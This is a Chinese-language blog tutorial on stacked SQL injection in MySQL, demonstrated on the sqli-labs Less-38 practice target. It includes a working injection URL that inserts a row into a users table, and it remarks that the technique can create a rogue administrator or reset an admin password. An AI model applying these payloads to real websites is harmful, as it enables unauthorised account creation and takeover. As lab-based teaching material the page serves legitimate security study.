首页 > 数据库 >SQL注入- 堆叠注入

SQL注入- 堆叠注入

时间:2023-02-04 20:36:05浏览次数:56  
标签:mysql dhakkan 堆叠 SQL +----+----------+------------+ id 注入

SQL注入- 堆叠注入

1.堆叠查询注入

​ stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql 中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。

在sql";" 语句后面加上另一条sql语句两条语句都会执行
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| challenges         |
| mysql              |
| performance_schema |
| security           |
+--------------------+
5 rows in set (0.00 sec)

mysql> use security;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from users;select * from emails;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | 111111     |
|  9 | admin1   | admin1     |
| 10 | admin2   | 111111     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 15 | admin'#  | 123456     |
| 16 | admin2'# | 123456     |
+----+----------+------------+
15 rows in set (0.00 sec)

+----+------------------------+
| id | email_id               |
+----+------------------------+
|  1 | [email protected]       |
|  2 | [email protected]       |
|  3 | [email protected]    |
|  4 | [email protected]   |
|  5 | [email protected]   |
|  6 | [email protected] |
|  7 | [email protected]   |
|  8 | [email protected]      |
+----+------------------------+
8 rows in set (0.00 sec)

在sqli-libs靶场38关注入

http://1.12.250.218:100/Less-38/index.php?id=1 ';insert into users(id,username,password) values ( 39, 'less38 ', 'hello ')--+

注入成功

1649140668846

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | 111111     |
|  9 | admin1   | admin1     |
| 10 | admin2   | 111111     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 15 | admin'#  | 123456     |
| 16 | admin2'# | 123456     |
| 39 | less38   | hello      |
+----+----------+------------+
16 rows in set (0.00 sec)

备注:堆叠注入的可以运用于创建用户由于我们使用网站用户进行注入不能查看到数据库的密码,密码是加密的,但是我们可以使用堆叠注入在管理员的数据库表中插入一条我们创建的管理员,我们就可以使用这个管理员账号进行登录,但是前提是网站的管理员必须是高权限才能完全创建用户。也可以使用update更新管理员用户密码。

参考链接:

https://www.cnblogs.com/backlion/p/9721687.html

标签:mysql,dhakkan,堆叠,SQL,+----+----------+------------+,id,注入
From: https://www.cnblogs.com/crabin/p/17092304.html

相关文章

  • SQLMAP使用
    sqlmap使用教程-u指定目标URL(可以是http协议也可以是https协议)-d连接数据库--dbs列出所有的数据库--current-db列出当前数据库--tables列出当前的表--column......
  • SQLGetShell
    SQLGetShell利用sql注入来上传我们的木马后门,连接得到服务器shell确定注入点得到网站目录user='andupdatexml(1,concat(0x7e,@@basedir,0x7e),0)--+&password=asdf&......
  • Qt中QSqlQueryModel对应的表格进行自动排序功能
    Qt中使用了自己的机制来避免使用SQL语句,为我们提供了更简单的数据库操作及数据显示模型,分别是只读的QSqlQueryModel,操作单表的QSqlTableModel和以及可以支持外键的QSqlRela......
  • P3基础篇-02.初识Redis-认识NoSQL
    Sql和NoSql的区别SQL(StructuredQueryLanguage):关系型数据库NoSql(NoStructuredQueryLanguage):非关系性数据库常见NoSql数据库:键值型数据库(Redis)文档型数据......
  • 《SQL基础》09. 事务
    目录事务简介操作方式一方式二四大特性(ACID)并发事务问题事务隔离级别事务简介事务是一组操作的集合,它是一个不可分割的工作单位。事务会把所有的操作作为一个整体一起......
  • 为若依逆向工程创建mysql视图
    createviewview_jin_xiao_cun2asSELECTa.jiezhuan_prod_codeasprod_code,a.jiezhuan_prod_nameasprod_name,IFNULL(b.jiezhuan_count,0)asqichu_count,IFNULL......
  • spring boot集成mybatis-plus——Mybatis Plus 打印 SQL 语句(包含执行耗时)
    MybatisPlus打印SQL语句(包含执行耗时) 更新时间2023-01-0817:03:24一、前言大家好,我是小哈。在《快速入门》 小节中,我们已经使用MybatisPlus对数据库进行了......
  • SQL SERVER——高可用技术概述
    自从SQLServer2005以来,微软已经提供了多种高可用性技术来减少宕机时间和增加对业务数据的保护,而随着SQLServer2008,SQLServer2008R2,SQLServer2012的不断发布,SQLSe......
  • SQL学习十一
    1.什么是存储过程,如何创建一个存储过程?存储过程的英文是StoredProcedure。它的思想很简单,就是SQL语句的封装。一旦存储过程被创建出来,使用它就像使用函数一样简单,我们......
  • Docker第二章:Docker镜像、容器卷、单机tomcat、mysql、redis安装
    镜像一种轻量级、可执行的独立软件包,我们把应用程序和配置依赖打包形成一个可交付的运行环境(包括代码、运行时所需的库、环境变量和配置文件等),这个打包好的运行环境就是im......